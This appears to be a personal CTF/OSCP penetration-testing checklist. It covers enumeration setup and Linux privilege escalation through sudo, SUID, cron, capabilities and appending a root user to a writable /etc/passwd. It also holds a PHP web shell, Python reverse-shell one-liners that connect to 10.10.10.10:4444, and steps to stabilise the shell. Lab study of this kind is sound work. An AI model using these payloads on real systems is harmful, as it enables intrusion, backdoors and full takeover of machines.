checklist

Checklist

Preperation

Expand

• Find IP of the machine

  • export IP=<MACHINE_IP>

  • export MACHINE_NAME=<MACHINE_NAME>

• Set folder structure

  • cd ctf/

  • mkdir -p $MACHINE_NAME/enum

  • mkdir -p $MACHINE_NAME/files

  • touch $MACHINE_NAME/enum/users.txt

  • cp templates/report.md ctf/$MACHINE_NAME/${MACHINE_NAME}.md

• Set hostname in etc/hosts (if helps)

Enumeration

Expand

Privilege Escalation

Expand

• privileges escalation

  • sudo -l

  • relative path exploitable?

    • Example: sudo /sudo_permited_location/../home/user/my_file

  • password re-use

    • from credentials founds in enum

    • su - <user>

      • Stabilize Shell $

        • which python -> python is here

        • python -c 'import pty; pty.spawn("/bin/bash")' -> interactive terminal spawned via python

        • tty quick test

        • export TERM=xterm-256color ⇾ export our terminal

        • alias ll='clear ; ls -lsaht --color-auto' ⇾ export ll command

        • stty raw -echo; fg; reset -> stable shell by control Z & backgrounding it

        • stty columns 200 rows 200

    • e.g: sudo /usr/bin/mysql -e '\! /bin/sh' sudo nopass for mysql

  • netstat -tupanl | grep -i '127.0.0.1' -> anything running on loopback

  • Netstat alternative ss -tunlp

  • cat /etc/crontab

  • find / -perm -u=s -type f 2>/dev/null

    • The first step is to identify all programs or files that have SUID bits enabled

      • example

        • /usr/bin/zsh

    • Read Source Code (if any)

    • look for files owned by root grouped by user.

    • ps aux | grep -i 'root' --auto-color <-- anything running as root?

      • lateral machines? (not done anything like this)

      • private ip address? (not done anything)

      • web root -> any db credes?

  • Take advantage of this misconfiguration by abusing the PATH variable

  • Take advantage of misconfigured cronjob.

  • find / -perm -u=g -type f 2>/dev/null -> Are there any GUID

  • ps ps auxwf -> Check for any writeable Or,

  • find / -type f -user root -perm /o=w | grep -v '/proc/

  • File transfer

    • Python http.server

  • simple HTTP server

    • download pspy

    • Second shell -> pspy<BIT>

    • getcap -r / 2>/dev/null -> Are there any extended permissions

    • exploit miss-configuration

  • writeable passwd?

    • perl -le 'print crypt("PassWord","addedsalt")'

    • echo "nullBrain:saltedvaluefromabove:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd

  • Privilege escalation Enum

    • https://github.com/diego-treitos/linux-smart-enumeration (is this allowed in OSCP?)

    • https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS (is this allowed in OSCP?)

  • kernel exploits?

    • https://github.com/mzet-/linux-exploit-suggester

    • e.g Dirty Cow example HowTo

  • world writable exploit

    • echo "<?php system('chmod +s /usr/bin/find'); ?>" > /stuffed

    • Using find related exploit

      • find .-exec /bin/bash -p \; -quit

Remote Code Execution (RCE)

Expand

• Remote Code Execution

  • <?php system($_GET['cmd']);?>

  • Verify RCE

    • e.g : http://$IP/<path>/?lang=/var/ftp/pub/backdoor.php&cmd=id.`

    • Payload:

      • https://github.com/nullbr41n/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

      • payload converter (hURL)

        • hURL -U export RHOST="$IP"; export RPORT="$PORT";python -c xxxx

      • python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

      • python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Reverse Shell

Expand

• Reverse Shell

  • web uploads

    • nc - nlvp 1 Listening on port 1

    • Upload payload on other side, should open connection

    • check RCE section.

      • Stabilize Shell $

        • which python -> python is here

        • python/python3 -c 'import pty; pty.spawn("/bin/bash")' -> import valid tty

        • tty quick test

        • export TERM=xterm-256color ⇾ export our terminal

        • alias ll='clear ; ls -lsaht --color-auto' ⇾ export ll command

        • stty raw -echo; fg; reset -> stable shell by control Z & backgrounding it

        • stty columns 200 rows 200